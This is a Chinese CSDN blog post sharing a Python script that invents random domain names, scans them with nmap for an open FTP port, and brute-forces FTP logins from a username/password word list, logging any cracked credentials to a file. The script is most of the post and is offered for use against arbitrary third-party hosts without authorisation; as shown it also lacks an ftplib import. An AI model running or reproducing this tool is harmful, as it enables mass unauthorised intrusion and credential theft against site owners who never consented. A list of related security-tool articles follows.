使用python扫描随机生成的域名开放端口 ,并尝试暴力破解FTP服务

最新推荐文章于 2024-07-29 11:17:00 发布
最新推荐文章于 2024-07-29 11:17:00 发布
阅读量1.5k 收藏 3
点赞数
分类专栏: python 文章标签: python ftp 破解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mzbqhbc12/article/details/54860803
版权

本代码属于使用python3.4版本  主要是交流  高手勿喷!!



#!/usr/bin/python
# -*- coding: utf-8 -*-
 
import nmap   # 需要使用nmap端口扫描工具的支持     这里不仅要安装nmap的python包  还要安装nmap的windows的应用程序    python包 直接使用pip安装即可    至于nmap for windows 的版本如何安装 请直接度娘
 
 
from socket import *
import threading 
import sys,random,time
import string,os
import configparser   ### 配置文件包
"""端口扫描工具  并且判断如果端口21打开 尝试暴力破解FTP"""
screenLock = threading.Semaphore(value=1)
def bruteLogin(hostname, passwdFile):
    """尝试破解FTP"""
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        time.sleep(1)
        userName = line.split(' ')[0]
        passWord = line.split(' ')[1].strip('\r').strip('\n')
       # print ("[+] 尝试攻击:%s      "%hostname+userName+"/"+passWord)
       # print("[-]主机:",hostname)
##        
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print( '\n[*] ' + str(hostname) +\
          ' FTP 账号和密码是: '+userName+"/"+passWord)
             
            ftp.quit()
            return (userName, passWord)
        except Exception:
            pass ##尝试失败 重试中
            
    print( '\n[-]FTP %s攻击失败!.'%hostname)
    return (None, None)
 
 
 
 
def nmapScan(tgtip,tgtPort,tgtHost):
     
    nmScan = nmap.PortScanner()
    try:
        nmScan.scan(tgtip,tgtPort)
     
    
        state=nmScan[tgtip]['tcp'][int(tgtPort)]['state']
    except :
        return None
    return state
    
 
def portScan(tgtHost, tgtPorts):
   
    try:
        tgtIP = gethostbyname(tgtHost)
       
    except:
        
        return
 
    try:
        tgtName = gethostbyaddr(tgtIP)   ## 这里是反向查询ip地址对应的DNS 主机名
 
    except :
        tgtName  = None
         
         
 
    setdefaulttimeout(1)
     
    scan = {}
    for tgtPort in tgtPorts:  
        state = nmapScan(tgtIP,str(tgtPort),tgtHost)
        if state =="open":  ### 发现开放端口 就在字典中写入
            if tgtHost not in scan :
                scan[tgtHost] = []
                 
                scan[tgtHost].append(str(tgtPort))
            else:
                 
                scan[tgtHost].append(str(tgtPort))
          
              
             
    if len(scan)>0:  ## 从字典中导出   根据字典中的数据写配置文件
        config =configparser.ConfigParser()
        config.add_section(tgtHost)
        config.set(tgtHost,"IP",tgtIP)
         
        if tgtName!=None:
            config.set(tgtHost,"主机名",tgtName[0])
        else:
            config.set(tgtHost,"主机名","未知")
        print("当前线程数: %d    当前扫描主机%s开放的端口有:"%(threading.activeCount()-1,tgtHost),scan[tgtHost])
        for x in scan[tgtHost]:
            config.set(tgtHost,"端口%s  "%x,"  isopen")
        cfgfile = open('IpConfig.ini','a')
        config.write(cfgfile)
        cfgfile.close()
        if "21" in scan[tgtHost]:
            print( '\n[+]FTP %s开始攻击!.'%tgtIP)
            passwdFile = 'userpass.txt'     ##设置ftp弱口令的用户名和密码字典    字典存放的规则是 用户名加空格加密码后换行  类似于: username password\n
            res = bruteLogin(tgtIP, passwdFile)
            if res[0]!=None:
                ftp = open("ftp.txt","a")
                ftp.write(tgtIP+"   :   userName = "+res[0]+"    password = "+res[1])
                ftp.close()
                 
             
             
             
    
              
         
         
         
         
def gethost(x):
   
    lis = ['z','y','x','w','v','u','t','s','r','q','p','o','n','m','l','k','j','i','h','g','f','e','d','c','b','a','1','2','3','4','5','6','7','8','9','0']
    s=''
    s =  (s.join(random.sample(lis, x))).replace(" ","")
         
    ss = [s+".cn",s+".cc",s+".com",s+".net",s+".pw",s+".wang",s+".vip",s+".tv",s+".org",s+".pub"]
    return (s,ss)
 
    
 
 
 
     
def main():
 
    driver = "D:\\Python34\\nmap"
    os.environ['PATH']=os.environ['PATH']+';'+driver
    ho =[]
    for x in range(12000):
        while True:   ##这里是一个避免重复的排除方式
            hos,Host =gethost(4)  ###这里是随机域名 
            if hos not in ho:
                ho.append(hos)   
                break
            else:
                continue
             
             
             
             
##        21/tcp FTP 文件传输协议 
##        22/tcp SSH 安全登录、文件传送(SCP)和端口重定向 
##        23/tcp Telnet 不安全的文本传送 
##        25/tcp SMTP Simple Mail Transfer Protocol (E-mail) 
##        69/udp TFTP Trivial File Transfer Protocol 
##        79/tcp finger Finger 
##        80/tcp HTTP 超文本传送协议 (WWW) 
##        88/tcp Kerberos Authenticating agent 
##        110/tcp POP3 Post Office Protocol (E-mail) 
##        113/tcp ident old identification server system 
##        119/tcp NNTP used for usenet newsgroups 
##        220/tcp IMAP3 
##        443/tcp HTTPS used for securely transferring web pages
##        3389/tcp windows服务器远程桌面端口
##        445/tcp 共享打印机端口
##        139/tcp 被用于Windows"文件和打印机共享"和SAMBA
 
        Port = [21,]  ##需要扫描的端口   这里 是扫描了ftp服务器 所以为了效率 全部只扫描21号端口
        for x in Host:
            t = threading.Thread(target=portScan,args=(x,Port))  ###开启线程 扫描随机的域名 
            t.start()
        while True:
            if threading.activeCount()-1>100:  ## 这里做了一个缓冲 限制了最大拥有100多个线程
                time.sleep(1)
            else:
                break
         
    
             
 
 
if __name__ == '__main__':
    main()


mzbqhbc12
关注
专栏目录
基于python域名爆破程序
文公子的博客
09-01 488
基于python域名爆破程序 一 、 任务情况 任务标题: 编写DNS枚举程序 1.1 任务目标 编写一个可以进行DNS枚举的程序 1.2 任务描述 在做信息收集时,多级域名的收集可以提升攻击面,多级域名的收集方式包括两种,一种是通过搜索引擎,也就是爬虫的方式,另外一种就是通过DNS暴力枚举的方式。 DNS暴力枚举的过程中会存在域名泛解析的问题,所以需要做判断然后进行优化 1.3 报告要求 1、理解DNS协议的原理,理解DNS解析的全过程 2、使用DNS暴力枚举的方式实现多级域名的收集 3、收集一些dns
Python安全攻防-从入门到入狱
热门推荐
Yasso的博客
01-31 1万+
Python安全攻防-从入门到入狱
random-open-port:一个Python工具,可轻松获取随机但未关联的端口
02-22
随机开放端口 随机开放端口提供了一些有用的功能,用于获取未被跟踪的随机端口,该随机端口在被识别为已知端口。 安装 pip3 install random-open-port 要求 Python 3+ 从命令行使用。 只需运行 foo@bar:~ $ random-port Random Port: 36952 例子 获取随机端口。 from random_open_port import random_port port = random_port() 获取附属端口。 from random_open_port import get_taken_ports taken_ports = get_taken_ports() 直接从Wikipedia获取端口。 from random_open_port import get_wiki_ports wiki_ports = get_wi
使用python处理子域名爆破工具subdomainsbrute结果txt
weixin_30889885的博客
10-24 375
近期学习了一段时间python,结合自己的安全从业经验,越来越感觉到安全测试是一个体力活。如果没有良好的coding能力去自动化的话,无疑会把安全测试效率变得很低。 作为安全测试而言,第一步往往要通过爆破目标站的一级域名开始。作为安全而言,最薄弱的地方往往不是主站,而是二级和三级域名。通过大牛lijiejie的工具subdomainsbrute我们可以轻松的获得一个子域名列表和IP的...
网络安全自学篇之Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具_端口扫描工具
最新发布
2401_85773496的博客
07-29 1339
Web渗透技术的核心是发现Web漏洞,发现漏洞有手工和软件自动化扫描两种方式。对于用户验证漏洞、用户凭证管理问题、权限特权及访问控制漏洞、缓存漏洞、跨站脚本漏洞、加密漏洞、路径切换漏洞、代码注入漏洞、配置漏洞、数据和信息泄露、输入验证码漏洞、操作系统命令脚本注入、资源管理漏洞、SQL注入等常见Web漏洞,都可以通过Web扫描器进行扫描
pythonDNS二级域名爆破
haha1314的博客
05-09 996
#进行暴力破解DNS二级域名 #利用nslookup 域名 循环尝试 import os from threading import Thread import time import sys y=sys.argv[1] z=['www','mail','info','wwww','home','music','map','news','open','like','org','my','lib',...
2.python编写子域名爆破工具
zh_cn1的博客
12-03 945
准备 socket sys subdomain.txt #用法: python3 subdomain.py xxxx.com import socket import sys domain = sys.argv[1] with open('subdomain.txt','r') as f: for i in f: i = i.strip() subdomain = i + '.'+domain try: ip = s
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5813
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
【进大厂必学】3W字180张图学习Linux基础总结
L的存在的博客
05-26 4488
就不多说这段时间干啥去了吧,期间和很多的同学聊了天,有的童鞋已经开始工作,聊了聊工作上的事儿。有的是今年即将毕业的童鞋,有着自己的小目标,有的想尝试互联网,所以现在基本上都快进行二轮的复习了,有的同学备战公务员,凭着年轻这股劲儿向往自己理想的生活状态,无论怎么样,长路漫漫,走一步,算一步,每一步都算数。 今天分享的这篇文章是 Linux 相关的基础知识,深一点的内容基本上没有,不过对于刚需小伙伴来说,也就够了,有时间的话,最好按照这些命令去试一试,敲一敲,这样记忆更加深刻。 老规矩,先看目录,文章比较长,建
网络扫描与网络侦察一
young的博客
11-01 2604
网络扫描与网络侦察 文章目录网络扫描与网络侦察前言一、网络扫描与网络侦察的目的二、常用工具1.Google Hacking(或baidu)2.BASE64编码3.Nmap4.WinHex三、被动扫描,利用搜索引擎或相关网站1. 麻省理工学院网站中文件名包含“network security”的pdf文档2.照片中的女生在哪里旅行?3、手机位置定位。4、编码解码5、地址信息四、NMAP使用1、利用NMAP扫描Metasploitable2(需下载虚拟机镜像)的端口开放情况。2、利用NMAP扫描Metas
渗透工具使用及思路总结(持续更新)
qq_58683895的博客
11-04 1002
所见所闻都收集于此
Python实现FTP文件传输的实例
01-01
FTP一般流程 FTP对应PASV和PORT两种访问方式,分别为被动和主动,是针对FTP服务器端进行区分的,正常传输过程中21号端口用于指令传输,数据传输端口使用其他端口。 PASV:由客户端发起数据传输请求,服务器端返回并携带数据端口,并且服务器端开始监听此端口等待数据,为被动模式; PORT:客户端监听端口并向服务器端发起请求,服务器端主动连接此端口进行数据传输,为主动模式。 其中TYPE分两种模式,I对应二进制模式、A对应ASCII模式; PASV为客户端发送请求,之后227为服务器端返回操作码表示成功,并且后面带有服务器端监听的端口:143×256(左移8位)+48 之后通过STO
使用python实现http及ftp服务进行数据传输的方法
09-20
今天小编就为大家分享一篇使用python实现http及ftp服务进行数据传输的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
域名挖掘,子域名爆破,Python脚本编写(Python安全攻防)。
qq_41046513的博客
11-17 7438
域名挖掘,子域名爆破,Python脚本编写(参考Python安全攻防渗透测试实战指南)。
Python程序之常用域名暴力破解
青柚的博客
05-30 395
新建一个name.txt文件,添加几个常见域名作为字典 编写扫描代码 import os import time from threading import Thread #加载字典 with open("G://powershell//lesson7//name.txt") as f: nlist=f.readlines() #print(nlist) #标...
java启动Python脚本,设置随机端口号,并验证端口是否被占用
j929244497的博客
03-23 1529
java启动Python脚本,设置随机端口号,并验证端口是否被占用所用依赖代码-验证端口号是否被占用代码-启动python脚本需要注意的点:验证: 所用依赖 //主要使用起来方便 <dependency> <groupId>cn.hutool</groupId> <artifactId>hutool-all</artifactId> <version>5.7.
【网络安全】nmap端口扫描初识(一)
2301_77472496的博客
06-05 1194
Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具,但是nmap也是有一些缺点的,比如说上手较难,但是难上手是相对的,与其他达到这种功能性的软件产品相比,还是比较容易上手的
【信息收集】用python实现子域名探测(二)
微雨停了的博客
04-08 2897
文章目录前言一、爬虫1.ip1382.bing二、通过字典进行子域名爆破三、python爬虫操作步骤1.写出请求头headers与目标网站url2.生成请求3.抓取数据4.分析源码,截取标签中内容四、爬虫一些总结1.抓取数据,生成soup2.从文档中获取所有文字内容3.从文档中找到所有< a >标签的链接 前言 意义:子域名枚举是为一个或多个域查找子域的过程,它是信息收集阶段的重要组成部分。 实现方法:使用爬虫与字典爆破。 一、爬虫 1.ip138 def search_2(domain):
python获取可用端口
comecheer.com
04-01 2107
def getPort(): pscmd = "netstat -ntl |grep -v Active| grep -v Proto|awk '{print $4}'|awk -F: '{print $NF}'" procs = os.popen(pscmd).read() procarr = procs.split("\n") tt= random.randin...
安全开发实战(3)--存活探测与端口扫描
记录开发和安全学习过程中的点点滴滴
04-18 1328
本篇主要是对上一篇,通过域名反差ip后,我们需要通过对主机进行存活监测以及存活的端口进行探测.本篇主要是对上一篇反查ip后,对整个ip段或是反查的ip进行存活的端口监测,确定目标主机开放端口以及对应的服务,通过两种不同的方式进行编写,两种方式各有各的好处吧.t=N7T8t=N7T8安全开发实战​http://t.csdnimg.cn/25N7H。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值